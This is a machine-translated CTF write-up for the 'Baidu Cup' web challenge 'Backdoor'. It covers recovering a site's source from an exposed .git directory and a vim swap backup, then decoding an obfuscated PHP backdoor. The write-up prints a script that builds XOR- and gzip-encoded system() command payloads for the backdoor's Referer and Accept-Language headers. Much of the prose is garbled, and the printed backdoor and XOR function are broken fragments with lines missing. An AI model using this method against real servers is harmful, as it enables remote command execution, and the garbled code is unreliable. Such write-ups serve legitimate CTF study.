Open questions , The title tells us that the title is document leakage .


By scanning the directory , We found that we could scan 3 File


But browsing flag.php It tells us that this is not really flag

Also linked to the title file leak , So the test .swp .swo .bak Backup file suffixes are fruitless . The final discovery is .git Let the cat out of the .

Let's go through this url


Notice that the return here is 403( The request was refused ), instead of 404( Invalid access ). Then you can use it here git Leaked script download down the source file .

What we use here is rip-git.pl This script ,github Address :https://github.com/kost/dvcs-ripper

notes : Here we use rip-git.pl The downloaded file can be viewed and uploaded github The history of . and Githack Although this tool can download files , But you can't look at history

see flag.php

see flag.php Log

git log flag.php

You can see that he has changed it many times flag.php This file , Let's go back to the last revision

git diff 12c6ddf4af0a5542c1cf6a9ab19b4231c1fd9a88 flag.php

commit The value of is test It's worth it that time , As you can see, before the modification, it was flag{true_flag_is_in_the_b4cko0r.php}


The upper one flag It's not really flag, So we visited flag Prompt file


Get the following information , Looking at the source code is nothing :

Finally, it was .swo File backup , We download the backup

Because it's messy code to open it , After I download it , To my kali On the desktop of the virtual machine , And then use vim Open the backup file

vim -r .b4ckdo0r.php.swo

Because in order to study this code , I can't change the backup file , We use it vim Copy function to copy the content to a new one php In the document , And put it back to me windows Next ( Because I like to use windows)

This code is confusing , But mainly $y and $L and $v this 3 A variable , Respectively corresponding to

$y = create_function  // The letters in the string are removed here b

$L = Put the top as $c, $f And so on “)m“ Get rid of it

$v = create_function('', $L); Here is to generate an anonymous function without parameters , The content of the function is $L The content of .

And then run $v() function

According to this logic, when the confusion is solved $L The content of :

Print the content to our local server , Then check the source code , And sort it out is b4ckdo0r.php Source content

Be careful : We must look at the source code here , Because there's a part in the middle "<" Be treated as html The label , There's no way to fully display

web The code in the original page is very strange

Look at the source code and find out why , Because < Started as a label

The source code is as follows :

function x($t,$k) {
for($i=0; $i<$l;) {
for($j=0; ($j<$c&&$i<$l); $j++,$i++) {
return $o;
if($rr&&$ra) {
if($q&&$m) {
for($z=1; $z<count($m[1]); $z++)
if(strpos($p,$h)===0) {
$s[$i]=""; $p=$ss($p,3);
if(array_key_exists($i,$s)) {
if($e) {
$d=base64_encode(x(gzcompress($o),$k)); print("<$k>$d</$k>");

Explain the code here ( Because I compare the dishes , Output the variable at each step , Finally, I found out 3 In hours or so )

x($t, $k) Function is an XOR function , The first parameter and the second parameter are bitwise XORs , If the second parameter is XOR all over again , The first one is not over yet , Starting from the head of the second parameter .

$rr It's through http The head of the newspaper Referer Parameters of the incoming , We can control it

$rs It's through http The head of the newspaper accept-language Parameters of the incoming , We can control it

Let's start with accpet-language Well , Take a chestnut

there zh-CN It's the default language , Then each value is represented by “,( comma )” separate , The format is “ Language ;q= The weight ”

that preg_match_all What this regular does , It's complicated , We output it directly to our own server web Come on.

Is a two-dimensional array , then $i Will take [1][0] and [1][1] Combined value of

$h and f Namely ($i . $kh) and ($i . $kf) Of md5 Before the value 3 The number of characters calculated here is 675 and a3e

This code will look at language How many languages do you have , then $p It is subscript to the decimal part of the weight , And then take Referer Of url A combination of values of parameters corresponding to subscripts in

Here's an example ,a=1 Medium 1 Namely $q[$m[2][0]],b=2 Medium 2 Namely $q[$m[2][1]]

Then there's judgment $p Before this variable 3 Is it 675, after 3 Is it a3e, Finally, our structure is "675 + payload + a3e"

And then there's the transmission eval It's in the function , Here we're going through eval Function to read the directory , Then check it out flag

eval There's a lot of coding in , We also use our own x($t, $k) This XOR function , Let's test the order in turn , So that we can generate our payload, To construct the system("ls");

Here is the law of XOR

a = b ^ c that b = a ^ c; It's a very simple rule , therefore x Functions even code functions , It's also a decoding function

Finally, I'll generate payload And decoding the content of the return value php Code


function x($t,$k) {
for($i=0; $i<$l;) {
for($j=0; ($j<$c&&$i<$l); $j++,$i++) {
$o.= $t{$i} ^ $k{$j};
return $o;
} function get_answer($str){
$str = base64_decode($str);
$str = x($str, '4f7f28d7');
$str = gzuncompress($str);
echo $str . "<br>";
} function input($cmd){
$str = 'system("' . $cmd . '");';
$t1 = gzcompress($str);
echo '$t1 = ' . $t1 . "<br>";
$t2 = x($t1, '4f7f28d7');
echo '$t2 = ' . $t2 . "<br>";
$t3 = base64_encode($t2);
echo '$t3 = ' . $t3 . "<br>";
return $t3;
} $ra='zh-CN,zh;q=0.0';
//get_answer(''); ?>

Enter the command into input Inside , Run the php The script will be generated ls Ordered payload, And we accep-language The content to be filled in is 'zh-CN,zh;q=0.0'

So for the first time we payload by :

Fill in the returned content in our script , Generate decoded content

Then generate cat this_i5_flag.php Of payload, Last flag In the source code

notes : When I audit the code here, I use a stupid method , Because we downloaded the source code , Then we can modify it at will , I'm putting value changes in every place , It's output directly , Facilitate a more thorough understanding of the process .

i spring and autumn “ Baidu Cup ”CTF match In October web topic Backdoor More articles about

  1. [i spring and autumn ]“ Baidu Cup ”CTF match In October -Hash

    Preface Knowledge points involved : Deserialization . Code execution . Command execution The subject comes from :i spring and autumn hash  If i If you have any questions about spring and autumn topics, you can log in to the information security association of Yulin University CTF Platform use Or use the source code provided in this article to independently reproduce [i spring and autumn ]" hundred ...

  2. i spring and autumn Baidu Cup ”CTF match In October login

    Sensitive information appears , Then log in Login success, find strange show And then put show Put it in there and have a try There's the source code , Audit code starts Out flag The conditions of the project are user It's spring and autumn Then proceed login From the deserialized logi ...

  3. i spring and autumn -“ Baidu Cup ”CTF match In October -Login

    Source code prompt Try to log in Get what the hell , But something suspicious was found in the corresponding bag    //  CTF Medium 0 and 1 These usually have routines And then in the request head Change it to 1 ## Here comes the code audit ..   It's been a long time Later I saw someone else's ...

  4. i spring and autumn ——“ Baidu Cup ”CTF match In October ——EXEC( Command execution 、 Out of band channels transmit data )

    Look at the source code to learn from vim To write , So find backup and exchange files find /.index.php.swp , After download vim -r Recover the file to get the source code 1 <html> 2 <head> 3 ...

  5. i spring and autumn ——“ Baidu Cup ”CTF match In October ——Not Found(http Request method ,client-ip forge ip)

    I'm also fascinated by this question ... Open it not found, For a time, I thought the server was down , A closer look reveals that 404.php The interview didn't find anything , Only the irony from the author haha~ But on the front page header I found a strange thing in the movie ...

  6. i spring and autumn ——“ Baidu Cup ”CTF match In October ——GetFlag(md5 Collision 、 File contains 、 Website absolute path )

    Need to submit captcha Satisfy the equation , Must be MD5 The collision Attach script import hashlib def func(md5_val): for x in range(1,100000000): md5_ ...

  7. i spring and autumn ——“ Baidu Cup ”CTF match In October ——Vld(Vulcan Logic Dumper 、php opcode、sql An error injection )

    Open the title and see the prompt "do you know Vulcan Logic Dumper?" , Look at the source code and see "<!-- index.php.txt ?>" ...

  8. i spring and autumn ——“ Baidu Cup ”CTF match In October ——Login

    According to the page source prompt test1 test1 Sign in Refresh this page and grab the package , There is one show=0 Worthy of attention At the end of the sent packet header Add a sentence to the list show:1, You can get member.php Source code <?php inc ...

  9. [ Repeat the original question ] Baidu Cup CTF match In October WEB EXEC(PHP Weak type )

    brief introduction   Repeat the original question :   Investigate knowledge points :PHP Weak type .   Online platforms :https://www.ichunqiu.com/battalion(i spring and autumn CTF platform ) The process Look at the source code and find this vim Let the cat out of the   I've tried them all ...

Random recommendation

  1. js Array de duplication method

    // Array weight removal Array.prototype.unique = function() { var newArr = [], hash = {}; for(var i=0, len=this.lengt ...

  2. [BTS] WCF-OracleDB

    When I insert some data to Oracle, BizTalk WCF-OracleDB throw this error. A message sent to adapter ...

  3. File storage, reading and writing ,XML File storage, reading and writing

    @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); s ...

  4. Vim Classic explanation


  5. java And Thread.sleep(long) And object.wait()/object.wait(long) The difference between ( turn )

    One .Thread.sleep(long) And object.wait()/object.wait(long) The difference between sleep(long) And wait()/wait(long) It's similar in behavior , The main differences are as follows :1 ...

  6. js Bubbling Capture

    <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> ...

  7. display:inline-block The gap thinking

    One . Fuse you 're right , There is always a kind of attribute that can help you find a shortcut easily , It can also add trouble to you , For example, the main idea of this article display:inline-block. As you all know , Its function is to present objects as inline objects , But the content of the object as a block object ...

  8. (Matlab)GPU Calculation and CPU A comparison of computing power

    %% First of all 200*200 We do addition, subtraction, multiplication and division of matrices   compare t = zeros(1,100); A = rand(200,200);B = rand(200,200);C = rand(200,200); fo ...

  9. cram for web Of the four :xhtml Study

    xhtml It's stricter and purer html Code , It is associated with html4.01 compatible .xhtml In order to xml Reconstruction amount html4.01 xhtml And 2000 year 1 month 26 Day to day w3c standard ,w3c take xhtml Defined as the latest html edition ...

  10. Naive Bayes of machine learning &amp; Bayesian network

    Bayesian decision theory       When all the correlation probabilities are ideal , Bayesian decision theory considers selecting the optimal marker based on these probabilities and misjudgment losses , The basic idea is as follows : (1) The priori probability and class conditional probability density are known ( likelihood ) (2) Using Bayesian transformation to posterior probability ...